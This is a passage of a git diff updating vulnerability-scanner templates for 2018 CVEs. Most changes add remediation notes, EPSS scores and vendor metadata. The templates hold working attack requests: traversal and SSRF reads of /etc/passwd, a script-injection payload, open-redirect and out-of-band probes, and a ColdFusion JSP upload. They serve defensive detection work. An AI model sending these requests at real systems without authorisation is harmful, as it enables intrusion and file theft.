and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of Django or apply the relevant patch provided by the Django project. reference: - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ - https://usn.ubuntu.com/3726-1/ - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403 - https://www.debian.org/security/2018/dsa-4264 - - http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/ - https://access.redhat.com/errata/RHSA-2019:0265 - https://nvd.nist.gov/vuln/detail/CVE-2018-14574 classification: @@ -18,9 +19,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - tags: cve,cve2018,django,redirect + epss-score: 0.01218 + epss-percentile: 0.83785 + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: djangoproject + product: django + tags: cve,cve2018,django,redirect http: - method: GET @@ -29,13 +35,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 301 - type: word + part: header words: - "Location: https://www.interact.sh" - "Location: http://www.interact.sh" - part: header -# Enhanced by md on 2022/10/13 + - type: status + status: + - 301 + +# digest: 4b0a00483046022100dda0bbb8b49a20aec6e2c924374046155a7d081c1b963b4a8151db31ae39d03b022100cf3eb79f04c9291b8ec9a278ce93f0c6b0fe1d5974214c0d2c1bf41f196b0696:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index c68a8d7650..508f04cd5b 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. + remediation: | + Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. reference: - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/45103/ @@ -14,21 +16,25 @@ info: cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 - tags: cve,cve2018,ssrf,lfi,packetstorm,edb + epss-score: 0.96833 + epss-percentile: 0.99575 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive http: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" - body: "fldr=&url=file:///etc/passwd" - + body: fldr=&url=file:///etc/passwd matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/04/01 +# digest: 4a0a00473045022100f934a5a382441426dd7f7e77cfaaf5fbfc18f658e87a50a3b83eee9888574d88022007fb93b84fd280f51b09507d2b7012977f0ef5191893cd146ab19cc62a8af189:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 7be1edfea5..56d578372d 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -5,19 +5,27 @@ info: author: 0x_Akoko severity: high description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. + remediation: | + Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 + - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - tags: cve,cve2018,cgit,lfi + epss-score: 0.9702 + epss-percentile: 0.99658 + cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cgit_project + product: cgit + tags: cve,cve2018,cgit,lfi http: - method: GET @@ -34,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/18 +# digest: 4a0a0047304502204f6d9a91f4cc2fba1b45170409ee5f114519f02dd26d43b517eedf7a2efe0fad022100d42889be22816f9ba73447f5aa34c0f3eaeab8cec511b1716dfbf8f410a1902c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index c6ab69c9ee..78d9ba35ba 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. + remediation: | + Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 @@ -15,9 +17,14 @@ info: cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 - tags: cve2018,loytec,lfi,packetstorm,seclists,cve + epss-score: 0.00483 + epss-percentile: 0.73234 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: loytec + product: lgate-902_firmware + tags: cve2018,loytec,lfi,packetstorm,seclists,cve http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 4a0a00473045022100f72504b98053b49a539444b3332a1c2a6f1c76a96cbb1069b797c00f3f8e5d430220049db9d20d590abe23d983ab9d500e153b72a49b76ea73e314c5c2ee2aa2d8b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index dd969d1069..14d0135cc3 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. + remediation: | + Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: - https://seclists.org/fulldisclosure/2019/Apr/12 - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html @@ -15,10 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 + epss-score: 0.44897 + epss-percentile: 0.96988 + cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"LGATE-902" verified: true + max-request: 1 + vendor: loytec + product: lgate-902_firmware + shodan-query: http.html:"LGATE-902" tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate http: @@ -37,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/07 +# digest: 4b0a00483046022100e1373eb7f21a96a7f64e46ff1e3e5c7fead6a50ce90f1927bdb9c6b0a87787680221009643eb438869f2f81c85259b001ecce03611f84dfe981bc0411bf3b6996be5fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index e69e2fbbb3..15df44a795 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + remediation: | + Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability. reference: - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14931 @@ -13,13 +15,17 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14931 cwe-id: CWE-601 - tags: cve,cve2018,redirect,polarisft,intellect + epss-score: 0.00118 + epss-percentile: 0.45607 + cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: polarisft + product: intellect_core_banking + tags: cve,cve2018,redirect,polarisft,intellect http: - method: GET - path: - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh' @@ -29,4 +35,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/04/26 +# digest: 4b0a00483046022100e52fa2091a0cd4b7720190ffdbdbe12a17eb524c4a94c53ad2189298e79295230221009148bf7e0fa051973a6f8c8fdfaa841af98bd291497ddd64f52d423f3a75e21c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 8977fc7dd6..b7054ef700 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080070 - https://www.exploit-db.com/exploits/45167/ @@ -14,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15138 cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal,edb + epss-score: 0.28185 + epss-percentile: 0.96306 + cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ericssonlg + product: ipecs_nms + tags: cve,cve2018,ericsson,lfi,traversal,edb http: - method: GET @@ -25,6 +32,7 @@ http: - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -35,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/07 +# digest: 4b0a00483046022100bf110e9a172648b169e2ac8634ab0a336a0620db7e9a8e8f2115b57e41e861da022100eff5bf4d60cf8062926f95fe87c9aebe6ea33fc445f09ffcc487f690ff9ab360:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 1c00fd5e65..3ded6baf7c 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + remediation: | + Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 @@ -15,9 +17,14 @@ info: cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + epss-score: 0.01414 + epss-percentile: 0.85036 + cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: central_wifimanager + tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast http: - method: GET @@ -30,4 +37,4 @@ http: words: - "http" -# Enhanced by mp on 2022/04/06 +# digest: 4a0a00473045022100897608b9ed2ff2e7847c46c4020488f2e3e307bab1a8ca5a9c7c53b77dac02f9022010696dc0434f9d98cbfcd6df8d1d0eac6d6fc62bdd72834b7c56700f21ad6958:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 16ff8bf50b..5b9eb877d3 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + remediation: | + Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/45271 - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb,seclists + epss-score: 0.97149 + epss-percentile: 0.99726 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,lfi,edb,seclists http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/08 +# digest: 490a004630440220630d56fd4c9b41a8486b4ca9e63331e3c6b6796ebb17c269d65d4b39375530cf02204b40eb6d86330aec14c94b2009a3d1296c2a50c985ce6d482a6cde2c94f8cc4c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 245414b2ed..9e3fcc6d3a 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + remediation: | + Upgrade to a patched version of Argus Surveillance DVR. reference: - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html @@ -16,9 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 - tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr + epss-score: 0.95386 + epss-percentile: 0.9914 + cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: argussurveillance + product: dvr + tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: @@ -38,4 +44,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/13 + +# digest: 4a0a004730450221008baab1428a7f85dd4d3142ed65677f479a2c45a30d995298a1e983c85617406802207c759ef81e4d189643077670bd118db531f42c7f2618f36e47ae14111c83bb8f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml new file mode 100644 index 0000000000..195bc533b1 --- /dev/null +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -0,0 +1,60 @@ +id: CVE-2018-15917 + +info: + name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45338 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 + - https://github.com/bbalet/jorani/issues/254 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2018-15917 + cwe-id: CWE-79 + epss-score: 0.05086 + epss-percentile: 0.92037 + cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: jorani_project + product: jorani + shodan-query: title:"Login - Jorani" + tags: cve,cve2018,jorani,xss + +http: + - raw: + - | + GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 + Host: {{Hostname}} + - | + GET /session/login HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '_jorani' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a13359b79871cdeb2a0abf1f8397782d3d7f500bd57f306b43ed3079aeaaf157022100b26869a1df861c97a318666ff4df9f5363a9c2790d057a7885a6b6bcb37eebb3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 8459db4064..68e4e08b32 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -5,18 +5,26 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + remediation: | + Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 + - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 + epss-score: 0.97447 + epss-percentile: 0.99937 + cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive @@ -53,20 +61,18 @@ http: {{randstr}}.jsp -----------------------------24464570528145-- - - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: word words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: - 200 -# Enhanced by mp on 2022/04/22 +# digest: 4a0a00473045022053104a5adbb6fcdc67ae937a744eb1446ac593acabcf9a7ea4c203aae57fe5b0022100eda324bbb9bfdd9a54883960f7c5d4ad1edda49dcb7910698172a620f5dfa4c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index fe5f414086..11cc51dd66 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -5,35 +5,44 @@ info: author: daffainfo severity: medium description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0. reference: - https://www.exploit-db.com/exploits/45342 - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342/ + - https://cert.vde.com/en-us/advisories/vde-2019-002 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - tags: cve,cve2018,iot,lfi,edb + epss-score: 0.3698 + epss-percentile: 0.96731 + cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: endress + product: wirelesshart_fieldgate_swg70_firmware + tags: cve,cve2018,iot,lfi,edb http: - method: POST path: - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4b0a004830460221008b0ba740536ec2f6e88d647ed842a1d56f3dab9c98161b6ea1056f72afc68de202210094882c77ab746065a981fb78e230d01766ad87858e42809b48738647fd6790a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index a8e8f28dd2..7aadc1ada1 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. reference: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ @@ -15,9 +17,14 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - tags: lfi,packetstorm,cve,cve2018,cybrotech + epss-score: 0.05113 + epss-percentile: 0.92052 + cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cybrotech + product: cybrohttpserver + tags: lfi,packetstorm,cve,cve2018,cybrotech http: - raw: @@ -35,4 +42,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/07/22 +# digest: 4a0a00473045022040b29fef7515adcaf261aeedfad82a9e49721f6e53cede5882d98952bdf863bb022100c75315086e9678b85f842b89d1753702b119cfda939857a62c2aa85d980dd5a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 2d3d270e8d..f081a5777d 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + remediation: | + Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html - https://nvd.nist.gov/vuln/detail/CVE-2018-16139 @@ -14,10 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16139 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.48476 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Bibliopac" verified: true + max-request: 1 + vendor: bibliosoft + product: bibliopac + shodan-query: title:"Bibliopac" tags: cve,cve2018,xss,bibliopac,bibliosoft http: @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502204576e359321cde225ac2c0e48854d62d67d24090f92eab708bc096907259b93c022100cfa9c8efd920cc7ce18d8987a650f6144a69dc412039868736951fa6954c57b8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 89ab9f7d60..cd0d4f1b12 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -6,20 +6,27 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 - https://wordpress.org/plugins/gift-voucher/ - https://www.exploit-db.com/exploits/45255/ - https://nvd.nist.gov/vuln/detail/CVE-2018-16159 - remediation: Fixed in version 4.1.8. + - https://wpvulndb.com/vulnerabilities/9117 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 + epss-score: 0.01247 + epss-percentile: 0.84014 + cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: codemenschen + product: gift_vouchers + framework: wordpress tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin http: @@ -41,4 +48,4 @@ http: - 'contains(body, "images") && contains(body, "title")' condition: and -# Enhanced by md on 2023/03/13 +# digest: 490a0046304402200285747056763f6e85e1200f3ab13ea5863ec5ae406b2c761a25168d17eef2c9022015bbbb21d4ff1c3349efc6e1dee1eee301e3fa645d9ec75080dfb9ea9ba334bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 5bfeb42247..b983f08146 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + remediation: | + Upgrade LogonTracer to a version higher than 1.2.0. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 @@ -15,9 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 - tags: rce,oast,edb,cve,cve2018,logontracer + epss-score: 0.14211 + epss-percentile: 0.9509 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jpcert + product: logontracer + tags: rce,oast,edb,cve,cve2018,logontracer,intrusive http: - raw: @@ -33,6 +40,6 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http -# Enhanced by mp on 2022/05/12 +# digest: 4b0a00483046022100a1000f4e19ffe77a733cce8e023afc16acbb378570dfed888bcbd95ef14414ed022100b2f27f210573d2325f49eef742853b37876aceaddbf2f843b2593315fef447fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index a99822eac0..8c015b6766 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -5,19 +5,28 @@ info: author: 0x240x23elu severity: critical description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. + remediation: | + Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/45438 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - http://seclists.org/fulldisclosure/2018/Sep/32 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi + epss-score: 0.10923 + epss-percentile: 0.94483 + cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wechat_brodcast_project + product: wechat_brodcast + framework: wordpress + tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi http: - method: GET @@ -26,8 +35,8 @@ http: matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/04/26 +# digest: 490a0046304402203b13c1f1393912c9542d4cd6cf3365fa4bc5ee1f43a84520b3ad15415b2e4d6802200ca13385671c13c5170ed909cbbaae2678250e64a6bfc8b0dcb5e1295c8a7c70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 86d4e413ce..55124b187b 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LG SuperSign CMS 2.5 